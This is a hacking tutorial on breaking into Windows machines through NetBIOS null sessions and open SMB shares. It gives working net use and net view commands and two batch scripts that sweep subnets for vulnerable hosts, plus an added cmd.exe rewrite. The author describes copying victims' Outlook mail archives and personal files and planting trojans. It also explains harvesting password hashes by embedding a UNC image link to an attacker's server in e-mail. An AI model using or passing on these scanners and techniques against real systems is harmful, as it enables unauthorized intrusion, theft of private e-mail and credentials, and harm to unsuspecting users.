Windows shares are one of the easiest ways to get unauthorized access to a remote computer. Most people enable shares for convenience, but Windows NT also creates hidden administrative shares (C$, D$ and so on for each fixed drive, plus ADMIN$ and IPC$) by default. Ordinary shares can be controlled fairly well by users. The administrative shares, however, cannot be removed for good through the sharing dialog, even by the Administrator: deleting one only lasts until the next restart, unless their automatic creation is switched off with the AutoShareServer (or AutoShareWks on a workstation) value under HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters.
NetBIOS over TCP/IP uses UDP 137 (name service), UDP 138 (datagram service) and TCP 139 (session service, which carries SMB); Windows 2000 and later also speak SMB directly on TCP 445. Access to a share is negotiated with a challenge-response exchange, and that exchange is where the most basic weakness lies. When one computer wants a share on another it sends a session request. The server answers with a challenge and then grants or denies access according to its own rules, either user-level (NT: is this an authenticated user with rights to the share or the server?) or share-level (Windows 98: does the supplied password match the one set on the share?). The problem with this scenario is that, by default, the client answers the challenge as the currently logged-on user. It sends something like: "user anu007tiger in workgroup tigerforce requests the share WHATEVER from your server", together with an LM/NTLM response, which is the user's password hash encrypted with the server's challenge. The password itself never crosses the wire, but the response is computed with well-known algorithms, so a server that you control, which chooses the challenge and records the reply, can run a dictionary or brute-force attack against it offline. The failure in the architecture is that the client volunteers its workgroup, username and challenge response to any server that asks, regardless of whether or not they are required. This means that if I have my server set up to grab incoming responses, I can crack the passwords behind them.
"How can I exploit these services?" you might ask. Well, the simplest way is to use NetBIOS null sessions to explore shares. A null session is an IPC$ connection made with an empty user name and an empty password, and you can establish one fairly easily provided the server still accepts anonymous connections to IPC$. NT is pretty rigorous about requesting credentials if its shares are protected (and the RestrictAnonymous value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa can shut null-session enumeration down entirely), but Windows 98 seems pretty vulnerable, in my experience. To establish a null session all you have to do is type in:
C:\> net use \\123.123.123.123\ipc$ "" /user:""
Where 123.123.123.123 is the actual IP address of the target. The two empty strings are the password and the user name; without them net use hands over your own credentials, which is an ordinary logon attempt rather than a null session. Note the backslashes: UNC paths are written \\host\share, not with forward slashes. There are only two possible responses to this command. It will succeed and print "The command completed successfully", or it will throw an error and fail. If the command succeeds you'll need to go on and explore what shares are available. To do this simply execute the following:
C:\> net view \\123.123.123.123
The target will respond with a list of available shares. The following is a result I received from a sample target:
Shared resources at \\123.123.123.123

Share name   Type   Used as   Comment
-------------------------------------------------------------------------------
Downloads    Disk
Pub          Disk
The command completed successfully.
The most common share found online is a printer share, which is fairly difficult to leverage. However, if you scan two or three subnets you're bound to run across someone who has shared an entire C: drive. Once you've identified a share, the simplest way to leverage access is to map the remote share to a local drive letter. To map the remote share 'Pub' as the local X: drive, for example, execute the following:
C:\> net use x: \\123.123.123.123\Pub
If the resource is password protected beyond basic user authentication (or the lack of it) you will be prompted to enter the password. Usually, though, if a C: drive is shared over the Internet the owner is so careless that further password protection is unlikely. Once the drive is mapped, simply use the Windows GUI through 'My Computer' to upload, download, explore and execute the contents of the remote drive.
Scanning for shares by hand, however, is tedious and time consuming. Since the scan consists of nothing but the repeated issuing of DOS commands (or executables available from a DOS prompt), the simplest way to speed up your search is to create a batch file.
Batch files are Windows shell scripts, a file that consists of DOS commands that are issued in sequence when the batch file is called.
The best known batch file is autoexec.bat. Batch files are creatable and readable from notepad. To create a batch file simply open notepad, write up the commands and save the file as 'somebat.bat'. You should be sure to enclose the title in quotation marks when saving it so that Notepad will save the file as a .bat rather than its default of .txt.
The problem with writing a batch file to scan a subnet is that the COMMAND.COM batch language of DOS and Windows 9x is of VERY limited utility. It has no arithmetic, so you cannot set a variable to a number and then add one to it; it is simply impossible to set a variable equal to a number and then reset it to its original value plus one. The only way to move 'x' from one to two is to test for one and then explicitly set x equal to two. To increment from a batch file, therefore, you call a second batch file that does nothing but that comparison-and-reset, one digit at a time. (The cmd.exe batch language of NT and 2000 does have set /a for arithmetic and for /L for counted loops; the approach below is the lowest common denominator that also runs on Windows 98.)
The following is the text of add.bat, which increments a three-digit host number one step at a time so that the scanner can walk a whole subnet (host numbers 0 to 254):
DOWNLOAD FULL EXECUTABLE (ADD.EXE + FK.EXE)
DOWNLOAD SOURCE (ADD.TXT + FK.TXT)
:: ADD.BAT
:: Increments a three digit number
:: Works by comparing each digit
:: H=hundreds, T=tens, D=digits
@echo off
if [%H%]==[] set H=0
if [%T%]==[] set T=0
if [%D%]==[] set D=0
:: Each line re-reads the variable after the line above may have changed it,
:: so the chains must run from 8 down to 0; in ascending order 0 would be
:: carried all the way up to 9 in one call
:DIGITS
if %D%==9 goto TENS
if %D%==8 set D=9
if %D%==7 set D=8
if %D%==6 set D=7
if %D%==5 set D=6
if %D%==4 set D=5
if %D%==3 set D=4
if %D%==2 set D=3
if %D%==1 set D=2
if %D%==0 set D=1
goto DONE
:TENS
set D=0
if %T%==9 goto HUNDREDS
if %T%==8 set T=9
if %T%==7 set T=8
if %T%==6 set T=7
if %T%==5 set T=6
if %T%==4 set T=5
if %T%==3 set T=4
if %T%==2 set T=3
if %T%==1 set T=2
if %T%==0 set T=1
goto DONE
:HUNDREDS
set T=0
:: 9 must wrap to 0 without falling through the chain below: if the reset
:: were done inside the chain, the last line would re-read H as 0 and set it to 1
if %H%==9 goto WRAP
if %H%==8 set H=9
if %H%==7 set H=8
if %H%==6 set H=7
if %H%==5 set H=6
if %H%==4 set H=5
if %H%==3 set H=4
if %H%==2 set H=3
if %H%==1 set H=2
if %H%==0 set H=1
goto DONE
:WRAP
set H=0
goto DONE
:DONE
As you can see this is rather clunky and inefficient. Combined with the next batch file, however, it makes a simple yet effective scanner. The batch file below walks a subnet, first pinging each host with a single packet to see whether it is alive, then attempting to establish a null session, logging any system that accepts one, enumerating and logging its shares, and finally requesting and logging nbtstat information from the target. All information is logged to vulnerable.txt in the same directory as the batch file. Note that add.bat must be in the same directory so that the calls to it succeed. Copy this file, save it as FK.bat, then run it from the command line by issuing:
C:\> fk.bat 123.123.123
Where 123.123.123 are the first three octets of the subnet you wish to scan. I have noticed that the scanner hangs at certain points and must be restarted. To avoid the pain of rescanning the entire subnet, the script accepts arguments that say where along the subnet to start. To pass them, simply type
C:\> fk.bat 123.123.123 A B C
Where A, B and C are the hundreds, tens and ones digits of the host number to start from (for example 0 4 1 to begin at host 42, since add.bat increments once before the first probe). Make sure to leave spaces between A, B and C, since they are separate arguments to the batch file. The code for FK.bat follows:
@echo OFF
set SUBNET=%1
set H=%2
set T=%3
set D=%4
echo Scanning subnet %SUBNET% >> vulnerable.txt
:START
call add.bat
REM Build the address without leading zeros: Windows reads an octet such
REM as 042 as octal, so 123.123.123.042 would probe host 34, not host 42
set IP=%SUBNET%.%H%%T%%D%
if %H%==0 set IP=%SUBNET%.%T%%D%
if %H%%T%==00 set IP=%SUBNET%.%D%
REM A real reply contains "TTL="; "Request timed out" and
REM "Destination host unreachable" do not
ping -n 1 %IP% | find "TTL=" > nul
if errorlevel 1 goto DEADIP
REM Empty password and empty user name make this a true null session
REM (NT/2000 syntax); without them net use sends your own credentials
net use \\%IP%\ipc$ "" /user:"" | find "completed" > nul
if errorlevel 1 goto notfound
echo %IP% >> vulnerable.txt
echo Got One! %IP% is vulnerable!
net view \\%IP% >> vulnerable.txt
nbtstat -A %IP% >> vulnerable.txt
goto endfind
:notfound
echo %IP% doesn't seem to be vulnerable
:endfind
if %H%%T%%D%==254 goto DONE
goto START
:DEADIP
echo %IP% doesn't seem to be alive
REM Stop at .254 here too, otherwise a dead last host runs the counter past 255
if %H%%T%%D%==254 goto DONE
goto START
:DONE
@echo ON
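As an added example, not part of the original page, here is the same scan rewritten for the cmd.exe batch language of Windows NT/2000 and later, where for /L counts for us and add.bat is unnecessary. It also tests liveness by looking for "TTL=" in the ping reply rather than the word "out", uses an empty user name and password so the IPC$ connection is a true null session, builds the host number as a plain decimal (the three-digit concatenation in FK.bat yields addresses such as .042 for hosts below 100, which Windows parses as octal), and disconnects each IPC$ session after logging so a long sweep does not leave hundreds of connections open. The file name nullscan.bat and the optional FIRST/LAST arguments are my own choices; the log keeps the page's name vulnerable.txt.

```batch
@echo off
setlocal
:: nullscan.bat (added example; the name and the FIRST/LAST arguments are assumptions)
:: Sweep one /24 for hosts that accept a NetBIOS null session and log their
:: shares and nbtstat data to vulnerable.txt, as FK.bat does.
:: Usage: nullscan.bat 123.123.123 [FIRST] [LAST]
if "%~1"=="" (
    echo Usage: %~nx0 SUBNET [FIRST] [LAST]    e.g. %~nx0 123.123.123 1 254
    exit /b 1
)
set "SUBNET=%~1"
set "FIRST=%~2"
set "LAST=%~3"
if "%FIRST%"=="" set "FIRST=1"
if "%LAST%"=="" set "LAST=254"
set "LOG=vulnerable.txt"
echo Scanning subnet %SUBNET%.%FIRST%-%LAST% >> "%LOG%"

:: for /L counts from FIRST to LAST in plain decimal, so there is no add.bat
:: and no leading-zero octet such as .042 (which Windows would read as octal)
for /L %%N in (%FIRST%,1,%LAST%) do call :probe %SUBNET%.%%N
endlocal
exit /b 0

:probe
set "IP=%~1"
:: A real reply contains "TTL="; "Request timed out" and
:: "Destination host unreachable" do not, so this is a better liveness test
:: than searching for the word "out"
ping -n 1 -w 500 %IP% | find "TTL=" > nul
if errorlevel 1 (
    echo %IP% does not seem to be alive
    goto :eof
)
:: Empty password and empty user name make this a true null session;
:: without them net use would present the scanning user's own credentials
net use \\%IP%\ipc$ "" /user:"" > nul 2>&1
if errorlevel 1 (
    echo %IP% does not seem to be vulnerable
    goto :eof
)
echo Got one: %IP% accepts a null session
echo %IP% >> "%LOG%"
net view \\%IP% >> "%LOG%" 2>&1
nbtstat -A %IP% >> "%LOG%" 2>&1
:: Disconnect so a long sweep does not leave hundreds of IPC$ sessions open;
:: reconnect by hand to any host listed in the log
net use \\%IP%\ipc$ /delete > nul 2>&1
goto :eof
```

Unlike FK.bat, this version does not leave the null session in place, so to follow up on a logged host you re-run the net use line for that address before net view or mapping a share. The "TTL=" and "completed" strings come from the English versions of ping and net; on a localized Windows the find patterns need adjusting.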
If you open several DOS command prompts at once you can run this batch file two or three times (one in each prompt) and speed up your subnet scans. If you get a vulnerable host, the batch will have already established a null session, so all you have to do is read the text log file and connect to the remote shares. Using this scanner sporadically over one weekend I was able to connect to a total of 4 remote machines (scanning approximately 9 subnets). Such was the level of insecurity that you could pull the Outlook archive file (archive.pst) from C:\Windows\Local Settings\Application Data\Microsoft\Outlook\ on every vulnerable machine.
Once you've copied this file you can import it into your own Outlook and peruse the victim's e-mail. You can gain other valuable information by copying other identity data (such as the contact list, or even the contents of the My Documents folder). Trojaning a target becomes trivial once you have write access at this level.
Another method for gaining access, especially if the target has password-protected shares, is to trick the target into requesting a share from a server you control. The target's machine will then authenticate to your server with the logged-on user's name and a challenge response computed from that user's password hash. Because your server chose the challenge, the captured response can be cracked offline; L0phtCrack does this fairly trivially and even includes an SMB packet capture facility to sniff the exchange. Tricking a machine into requesting a share is as simple as getting the target to view a linked file, for example an image in an HTML e-mail or web page whose source points at your server: in place of the usual absolute or relative link, substitute a UNC path such as \\your.server\share\image.gif, and the client will try to fetch it over SMB, authenticating as it goes.